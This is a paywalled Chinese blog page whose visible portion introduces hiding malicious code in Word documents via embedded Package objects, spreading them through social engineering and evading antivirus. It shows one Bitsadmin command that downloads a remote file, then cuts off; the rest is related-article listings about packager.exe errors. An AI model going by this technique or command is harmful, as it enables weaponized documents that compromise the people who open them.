Word 通过添加Package 实现word藏毒

最新推荐文章于 2025-03-06 10:15:40 发布
原创 最新推荐文章于 2025-03-06 10:15:40 发布 · 2.6k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Word通过添加Package实现藏毒 #Word藏毒

本文介绍了如何通过Word的Package功能来实现类似宏病毒的隐藏恶意代码,包括利用cmd、powershell下载远程文件,图片藏毒技术,以及创建快捷方式插入Word的Package对象中,伪装成正常文档进行传播。该方法需要了解基本图片文件格式和利用社会工程学进行扩散。

这个思路要结合近期在一些安全网站上公布的姿势来实现,先科普几个地方。

(1)通过cmd本身就可以直接下载:

Bitsadmin /transfer AA /download /priority normal "http://..." "..."

其实讲道理也可以直接调用Bitsadmin.exe cmd没关系。问题是刚刚我测试一发,返现woc 360竟然报毒了?


然后我换了个姿势,直接cm

最低0.47元/天 解锁文章
精选资源
java实现word表格指定位置盖章,并且设置章悬浮于文字之上
05-31
在Java开发中,实现Word表格指定位置盖章并设置...综上所述,Java通过Apache POI库可以实现Word表格指定位置盖章并且设置章悬浮于文字之上的功能,这需要对Word文档结构有深入理解,以及熟练运用Apache POI的相关API。
office对象包插件.rar
04-17
请将此文件放入“C:\WINDOWS\system32”文件夹中 支持全office版本
打开WORD内嵌对象,提示package未安装报错
SAP
06-05 1万+
操作Word时,有事会提示“此对象创建于package中。此应用程序不能用来打开此对象。请确认此应用程序已正确安装,并且未被删除、移动或重命名。” 其实这个问题的出现就是因为你的C盘中没有package文件,解决办法非常简单,就是可以去别人电脑上的C盘面windows/system32文件夹下找到一个名字为packager的应用程序拷贝下来放到你的电脑上面的这个位置上就ok了。
wordpackage提取器
weixin_30872671的博客
01-08 308
当在word中点击package时,会在目录C:\Users\yxstars\AppData\Local\Temp下产生缓存文件,复制出来即可。 wordpackage提取器,正在开发..... 转载请注明出处:http://blog.youkuaiyun.com/yxstars/article/details/8479980 转载于:https://www.cnblogs...
碰到的word文档提示找不到package解决办法
kimjin1988的专栏
01-26 9361
打开word有时会提示:此对象创建于package中。此应用程序不能用来打开此对象。请确认此应用程序已正确安装,并且未被删除、移动或重命名。 解决方法其实很简单:从别的地方找一个packager.exe的文件,将其拷贝到windows/system32下即可。分享一个我拷贝的packager.exe,如下: packager.exe的下载地址
word 文档中嵌入和链接OLE 对象|Packager-对象包装程序
热门推荐
haiross的专栏
03-25 2万+
Packager-对象包装程序1    ㈠、“对象包装程序”概述   “对象包装程序”是一种用于创建可以插入到某个文档中的程序包的工具。   “对象包装程序”窗口有两个窗格。“外观”窗格显示代表对象包的图标。“内容”窗口显示包含要打包信息的文档名称。   要创建对象包,您需要复制“外观”和“内容”窗格的内容,然后将信息粘贴到文件中。对象包在文档中显示为图标。  
java word文档添加水印
08-23 2092
支持一行多个,一页多行水印,支持使用libreoffice将word转pdf后水印有效
C#实现Word文档中插入Windows控件 (附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
07-01 306
C#实现Word文档中插入Windows控件 (附完整源码)
go语言实现word处理(附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
03-06 564
go语言实现word处理(附完整源码)
C#实现读取Word数据到文本文件(附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
07-01 345
C#实现读取Word数据到文本文件(附完整源码)
packager.exe
10-26
PACKAGER.EXE是微软Windows操作系统相关工具,用于对象安装包。 解决:XP中word打不开内嵌对象
office插入对象用的packager.exe.zip
11-05
office插入对象用的packager.exe.zip 当用word打开对象包的时候报下面的错误:“用于创建此对象的程序是 Package。您的计算机尚未安装此程序。若要编辑此对象,您必须安装可以打开此对象的程序。” 在网上下载packager.exe后(注意不是package.exe),将packager.exe文件放到C:\WINDOWS\system32目录下即可。
word中提示“此对象创建于package中。此应用程序不能用来打开此对象”的解决办法
u010053027的专栏
07-11 1万+
操作Word时,有事会提示“此对象创建于package中。此应用程序不能用来打开此对象。请确认此应用程序已正确安装,并且未被删除、移动或重命名。”如下图所示 上面是word2003中的提示,在2007中会稍微有点不同,但是解决办法却是一样的。 其实这个问题的出现就是因为你的C盘中没有package文件,解决办法非常简单,就是可以去别人电脑上的C盘面windows/system32文件
word/Excel 此对象创建于package中,此应用程序不能用来打开此对象
山里来的鱼
06-15 1万+
摘自http://tieba.baidu.com/f?kz=673074802在word/Excel文档中要打开一个包         1."点击" 出现 "即将激活一个嵌入对象,可能带有病,是否继续"         2. 点击"是"以后,则出现了这个提示: "此对象创建于package中,此应用程序不能用来打开此对象,请确认此应用程序已正确安装,并未被删除,移动或重命名"
word文档与xml关系
是鲤鱼啊
08-04 7622
Office2003以上,Word可以以XML文本格式存储,这样就可以使用外部程序创建Word文件,而不需要使用Word的对象。 也能够自由的打开分析Word文件,或者发布到自己的Web页面,或者其他更多应用。 创建word,通过另存为xml文件,即可得到: 1.xml: ...
对vs2010的插件扩展(package)(一)------vsct文件的编写
xiaoyu_mengmeng的博客
10-29 1377
使用vs package对vs2010的插件扩展
国家自然科学基金项目数据分析与可视化工具_国家自然科学基金项目数据科研项目分析资助趋势统计学科领域分布项目负责人信息经费使用情况成果产出评估国际合作研究青年科学基金.zip
12-01
国家自然科学基金项目数据分析与可视化工具_国家自然科学基金项目数据科研项目分析资助趋势统计学科领域分布项目负责人信息经费使用情况成果产出评估国际合作研究青年科学基金.zip
JouChin_TurbineMarineProject_44300_1764554191333.zip
最新发布
12-01
JouChin_TurbineMarineProject_44300_1764554191333.zip
【太阳能电池系统与逆变器】太阳能电池的电压输出被储存在电池中,同时直流电压通过五级逆变器转换为交流电(Simulink仿真实现
12-01
【太阳能电池系统与逆变器】太阳能电池的电压输出被储存在电池中,同时直流电压通过五级逆变器转换为交流电(Simulink仿真实现)内容概要:本文档围绕太阳能电池系统与逆变器展开,重点介绍了一个基于Simulink的仿真模型,其中太阳能电池产生的直流电压被储存于电池中,并通过五级逆变器转换为交流电。该系统仿真涵盖了光伏发电、储能管理和电力电子变换的核心环节,突出了多级逆变器在提升电能质量和转换效率方面的优势。文中详细描述了系统结构、工作原理及Simulink建模过程,有助于理解可再生能源系统的能量转换与控制策略。; 适合人群:具备一定电力电子、自动控制或新能源系统基础知识的高校学生、研究人员及工程技术人员。; 使用场景及目标:①用于教学演示太阳能发电系统的能量流动与转换过程;②支持科研中对多级逆变器拓扑结构的性能分析与优化设计;③为微电网、分布式能源系统中的储能与并网控制提供仿真基础。; 阅读建议:建议结合Simulink软件实际操作,深入理解模型各模块的功能与参数设置,并可通过修改逆变器级数或控制策略进行拓展性实验,以增强对系统动态响应和稳定性的认识。
修复Word提示:无法打开在package中创建的对象
最后,packager.exe是Office软件中较早版本的一个组件,在较新的Office版本中,其功能可能已经被内置到Word或其他Office应用程序中,或者已经用其他方式实现对象的嵌入,因此在新版本中可能不再需要单独的packager....
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值